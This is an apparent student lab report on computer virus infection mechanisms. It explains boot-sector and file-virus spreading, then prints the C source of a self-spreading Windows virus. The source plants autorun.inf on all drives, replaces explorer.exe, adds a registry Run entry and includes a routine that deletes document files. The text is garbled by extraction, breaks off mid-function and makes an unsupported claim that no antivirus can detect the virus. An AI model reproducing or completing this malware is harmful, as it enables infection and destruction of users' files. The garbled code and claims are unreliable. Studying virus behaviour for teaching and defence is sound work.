計算機(jī)病毒實(shí)驗(yàn)報告

1、計算機(jī)病毒原理實(shí)驗(yàn)報告專業(yè)：信息安全班級：0903班姓名：學(xué)號：時間：2012年1月3日計算機(jī)病毒的傳染機(jī)制：1 計算機(jī)病毒的傳染方式 所謂傳染是指計算機(jī)病毒由一個載體傳播到另一個載體，由一個系統(tǒng)進(jìn)入另一個系統(tǒng)的過程。這種載體一般為磁盤或磁帶，它是計算機(jī)病毒賴以生存和進(jìn)行傳染的媒介。但是，只有載體還不足以使病毒得到傳播。促成病毒的傳染還有一個先決條件，可分為兩種情況，或者叫做兩種方式。 其中一種情況是，用戶在進(jìn)行拷貝磁盤或文件時，把一個病毒由一個載體復(fù)制到另一個載體上?；蛘呤峭ㄟ^網(wǎng)絡(luò)上的信息傳遞，把一個病毒程序從一方傳遞到另一方。這種傳染方式叫做計算機(jī)病毒的被動傳染。 另外一種情況是，計算機(jī)病

2、毒是以計算機(jī)系統(tǒng)的運(yùn)行以及病毒程序處于激活狀態(tài)為先決條件。在病毒處于激活的狀態(tài)下，只要傳染條件滿足，病毒程序能主動地把病毒自身傳染給另一個載體或另一個系統(tǒng)。這種傳染方式叫做計算機(jī)病毒的主動傳染。 2 計算機(jī)病毒的傳染過程 對于病毒的被動傳染而言，其傳染過程是隨著拷貝磁盤或文件工作的進(jìn)行而進(jìn)行的，而對于計算機(jī)病毒的主動傳染而言，其傳染過程是這樣的：在系統(tǒng)運(yùn)行時，病毒通過病毒載體即系統(tǒng)的外存儲器進(jìn)入系統(tǒng)的內(nèi)存儲器，常駐內(nèi)存，并在系統(tǒng)內(nèi)存中監(jiān)視系統(tǒng)的運(yùn)行。在病毒引導(dǎo)模塊將病毒傳染模塊駐留內(nèi)存的過程中，通常還要修改系統(tǒng)中斷向量入口地址（例如INT 13H或INT 21H），使該中斷向量指向病毒程序傳染

3、模塊。這樣，一旦系統(tǒng)執(zhí)行磁盤讀寫操作或系統(tǒng)功能調(diào)用，病毒傳染模塊就被激活，傳染模塊在判斷傳染條件滿足的條件下， 利用系統(tǒng)INT 13H讀寫磁盤中斷把病毒自身傳染給被讀寫的磁盤或被加載的程序，也就是實(shí)施病毒的傳染，然后再轉(zhuǎn)移到原中斷服務(wù)程序執(zhí)行原有的操作。 計算機(jī)病毒的傳染方式基本可分為兩大類，一是立即傳染，即病毒在被執(zhí)行到的瞬間，搶在宿主程序開始執(zhí)行前，立即感染磁盤上的其他程序，然后再執(zhí)行宿主程序；二是駐留內(nèi)存并伺機(jī)傳染，內(nèi)存中的病毒檢查當(dāng)前系統(tǒng)環(huán)境，在執(zhí)行一個程序或D1R等操作時傳染磁盤上的程序，駐留在系統(tǒng)內(nèi)存中的病毒程序在宿主程序運(yùn)行結(jié)束后， 仍可活動，直至關(guān)閉計算機(jī)。 3 系統(tǒng)型病毒傳染

4、機(jī)理 計算機(jī)軟硬盤的配置和使用情況是不同的。軟盤容量小，可以方便地移動交換使用，在計算機(jī)運(yùn)行過程中可能多次更換軟盤；硬盤作為固定設(shè)備安裝在計算機(jī)內(nèi)部使用，大多數(shù)計算機(jī)配備一只硬盤。系統(tǒng)型病毒針對軟硬盤的不同特點(diǎn)采用了不同的傳染方式。系統(tǒng)型病毒利用在開機(jī)引導(dǎo)時竊獲的INT 13控制權(quán)，在整個計算機(jī)運(yùn)行過程中隨時監(jiān)視軟盤操作情況， 趁讀寫軟盤的時機(jī)讀出軟盤引導(dǎo)區(qū)，判斷軟盤是否染毒，如未感染就按病毒的寄生方式把原引導(dǎo)區(qū)寫到軟盤另一位置，把病毒寫入軟盤第一個扇區(qū)，從而完成對軟盤的傳染。染毒的軟盤在軟件交流中又會傳染其他計算機(jī)。由于在每個讀寫階段病毒都要讀引導(dǎo)區(qū)，既影響微機(jī)工作效率，又容易因驅(qū)動器頻繁尋

5、道而造成物理損傷。系統(tǒng)型病毒對硬盤的傳染往往是在計算機(jī)上第一次使用帶毒軟盤進(jìn)行的，具體步驟與軟盤傳染相似，也是讀出引導(dǎo)區(qū)判斷后寫入病毒。 4 文件型病毒傳染機(jī)理 當(dāng)執(zhí)行被傳染的.COM或.EXE可執(zhí)行文件時，病毒駐人內(nèi)存。一旦病毒駐人內(nèi)存，便開始監(jiān)視系統(tǒng)的運(yùn)行。當(dāng)它發(fā)現(xiàn)被傳染的目標(biāo)時，進(jìn)行如下操作： （1）首先對運(yùn)行的可執(zhí)行文件特定地址的標(biāo)識位信息進(jìn)行判斷是否已感染了病毒； （2）當(dāng)條件滿足，利用INT 13H將病毒鏈接到可執(zhí)行文件的首部或尾部或中間，并存入磁盤中； （3）完成傳染后，繼續(xù)監(jiān)視系統(tǒng)的運(yùn)行，試圖尋找新的攻擊目標(biāo)。文件型病毒通過與磁盤文件有關(guān)的操作進(jìn)行傳染，主要傳染途徑有： （1）

6、加載執(zhí)行文件 文件型病毒駐內(nèi)存后，通過其所截獲的INT 21中斷檢查每一個加載運(yùn)行可執(zhí)行文件進(jìn)行 傳染。加載傳染方式每次傳染一個文件，即用戶準(zhǔn)備運(yùn)行的那個文件，傳染不到那些用戶沒有使用的文件。 （2）列目錄過程 一些病毒編制者可能感到加載傳染方式每次傳染一個文件速度較慢，不夠過癮，于是后來造出通過列目錄傳染的病毒。 在用戶列硬盤目錄的時候，病毒檢查每一個文件的擴(kuò)展名，如果是可執(zhí)行文件就調(diào)用病毒的傳染模塊進(jìn)行傳染。 這樣病毒可以一次傳染硬盤一個于目錄下的全部可執(zhí)行文件。DIR是最常用的DOS命令，每次傳染的文件又多，所以病毒的擴(kuò)散速度很快，往往在短時間內(nèi)傳遍整個硬盤。 對于軟盤而言，由于讀寫速度

7、比硬盤慢得多，如果一次傳染多個文件所費(fèi)時間較長，容易被用戶發(fā)現(xiàn)，所以病毒“忍痛”放棄了一些傳染機(jī)會，采用列一次目錄只傳染一個文件的方式。 （3）創(chuàng)建文件過程 創(chuàng)建文件是DOS內(nèi)部的一項(xiàng)操作，功能是在磁盤上建立一個新文件。 已經(jīng)發(fā)現(xiàn)利用創(chuàng)建文件過程把病毒附加到新文件上去的病毒，這種傳染方式更為隱蔽狡猾。因?yàn)榧虞d傳染和列目錄傳染都是病毒感染磁盤上原有的文件，細(xì)心的用戶往往會發(fā)現(xiàn)文件染毒前后長度的變化，從而暴露病毒的蹤跡。而創(chuàng)建文件的傳染手段卻造成了新文件生來帶毒的奇觀。好在一般用戶很少去創(chuàng)建一個可執(zhí)行文件，但經(jīng)常使用各種編譯、連接工具的計算機(jī)專業(yè)工作者應(yīng)該注意文件型病毒發(fā)展的這一動向，特別在商品軟

8、件最后生成階段嚴(yán)防此類病毒。實(shí)驗(yàn)所用病毒介紹：本病毒所具有的功能：1.在所有磁盤的根目錄生成和autorun.inf文件2.生成病毒體：c:windowsc:windowsexplorer.exec:windowssystem32dllcacheexplorer.exec:windowssystemmsmouse.dllc:windowssystem32cmdsys.sysc:windowssystem32mstsc32.exe3.病毒體c:windowsexplorer.exe感染原explorer.exe文件，使其不需要修改注冊表做到啟動時在explorer.exe前啟動4.修改注冊表，

9、在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun設(shè)置自啟動項(xiàng)（此操作不使用windowsAPI,防止用戶對病毒體的發(fā)現(xiàn)，并實(shí)現(xiàn)并行執(zhí)行）5.生成的autorun.inf改變磁盤的打開方式，使其在windows2000以上的系統(tǒng)無論選擇“打開”、“雙擊”、“資源管理器”等方式都無法打開分驅(qū)，而是以運(yùn)行病毒的方式取而代之。6.連鎖能力，將病毒體相連，實(shí)現(xiàn)相連復(fù)制更新7.使用進(jìn)程不斷調(diào)用進(jìn)程，使得在任務(wù)管理里無法結(jié)束病毒進(jìn)程8.不斷搜索磁盤，只要發(fā)現(xiàn)未感染病毒的一律感染，病毒刪除后1秒內(nèi)再建9.生成垃圾文件（DESTORY_感染

10、_任意數(shù)字）5個于C盤下10.附帶刪除文件函數(shù)（為防止危害，本函數(shù)默認(rèn)不執(zhí)行）本病毒到目前為止任何殺毒軟件都無法將其查殺本病毒單機(jī)默認(rèn)使用對機(jī)器無害（破壞代碼已屏蔽）提供病毒卸載程序（保存為X.BAT，雙擊運(yùn)行即可卸載）：病毒源程序：/* SVCHOST.C */* SVCHOST.EXE */* SVCHOST.COM */#include<stdio.h> /*標(biāo)準(zhǔn)輸入輸出*/ #include<string.h> /*字符串操作*/ #include<stdlib.h> /*其它函數(shù)*/ #include<process.h> /*進(jìn)程控制

11、*/#include<dir.h> /*目錄函數(shù)*/#define SVCHOST_NUM 6 /*關(guān)鍵位置病毒復(fù)制數(shù)量*/#define RUBBISH_NUM 5 /*垃圾文件數(shù)量*/#define REMOVE_NUM 5 /*刪除文件數(shù)*/ /*=*/*文件AUTORUN.INF內(nèi)容： 1.自動運(yùn)行SVCHOST.com 2.覆蓋默認(rèn)打開命令，使用病毒體作為新的打開方式 3.覆蓋默認(rèn)資源管理器命令，使病毒體作為新的命令方式*/ char *autorun="AutoRunnopen="SVCHOST.com /s"nshellopen=打開(&

12、amp;O)nshellopenCommand="SVCHOST.com /s"nshellexplore=資源管理器(&X)nshellexploreCommand="SVCHOST.com /s""/*=*/* 添加注冊表項(xiàng)： 1.自動運(yùn)行生成病毒體C:windows*/char *regadd="REGEDIT4nnHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunn"wjview32"="C:windows /s"

13、;"/*=*/*函數(shù)：復(fù)制文件 復(fù)制源：infile 目的地：outfile 成功返回0，失敗返回1*/ int copy(char *infile,char *outfile) FILE *input,*output; char temp; if(strcmp(infile,outfile)!=0 && (input=fopen(infile,"rb")!=NULL) && (output=fopen(outfile,"wb")!=NULL) while(!feof(input) fread(&temp

14、,1,1,input); fwrite(&temp,1,1,output); fclose(input); fclose(output); return 0; else return 1;/*=*/* 函數(shù)：通過explorer自動運(yùn)行 成功返回0，失敗返回1,2*/ int autorun_explorer() FILE *input; if(input=fopen("c:windowssystemexplorer.exe","rb")!=NULL) fclose(input); remove("c:windows$temp$&quo

15、t;); remove("c:windowssystem32dllcache$temp$"); return 1; copy("c:windowsexplorer.exe","c:windowssystemexplorer.exe"); rename("c:windowsexplorer.exe","c:windows$temp$"); rename("c:windowssystem32dllcacheexplorer.exe","c:windowssystem32

16、dllcache$temp$"); if(copy("SVCHOST.com","c:windowsexplorer.exe")=0 && copy("SVCHOST.com","c:windowssystem32dllcacheexplorer.exe")=0) return 0; else return 2;/*=*/* 函數(shù)：添加注冊表項(xiàng) 成功返回0，失敗返回1*/ int add_reg() FILE *output; if(output=fopen("$",&

17、quot;w")!=NULL) fprintf(output,regadd); fclose(output); spawnl(1,"c:windowsregedit.exe"," /s $",NULL); /*=*/* 函數(shù)：復(fù)制病毒 + Autorun.inf自動運(yùn)行 */ void copy_virus() int i,k; FILE *input,*output; char *files_svchostSVCHOST_NUM="","c:windows","c:windowssystemM

18、SMOUSE.DLL","c:windowssystem32cmdsys.sys","c:windowssystem32mstsc32.exe","c:windowsexplorer.exe" char temp220="c:","c:autorun.inf" for(i=0;i<SVCHOST_NUM;i+) if(input=fopen(files_svchosti,"rb")!=NULL) fclose(input); for(k=0;k<SVCH

19、OST_NUM;k+) copy(files_svchosti,files_svchostk); i=SVCHOST_NUM; for(i=0;i<SVCHOST_NUM;i+) if(input=fopen(files_svchosti,"rb")!=NULL) fclose(input); for(k=0;k<24;k+) copy(files_svchosti,temp0); if(output=fopen(temp1,"w")!=NULL) fprintf(output,"%s",autorun); fclose(

20、output); temp00+; temp10+; i=SVCHOST_NUM; /*=*/* 函數(shù)：制造垃圾文件 */ void make_rubbish() int i; FILE *output; srand(0); for(i=0;i<RUBBISH_NUM;i+) int n; char s30; n=rand(); sprintf(s,"C:DESTORY_感染_%d",n); if(output=fopen(s,"w")!=NULL) fprintf(output,"%ld%s",n*n,s); fclose(o

21、utput); /*=*/* 函數(shù)：刪除文件*/ void remove_files() long done; int i; struct _finddata_t ffblk; char *remove_files3="*.txt","*.doc","*.xls" for(i=0;i<3;i+) if(_findfirst(remove_filesi,&ffblk)=-1) continue; while(!done) remove(); _findnext(done,&ffblk); _findclose(done); /*=*/* 主程序 使用DEV-CPP 32位C工程 實(shí)現(xiàn).C程序脫離命令行界面，于后臺執(zhí)行*/ int main(int argc,char *argv) int contral=0; if(argc>1) if(strcmp(argv1,"/s")=0) goto next1; autorun_explorer(); spawnl(1,"c:windowssystemexplorer.exe",NULL); next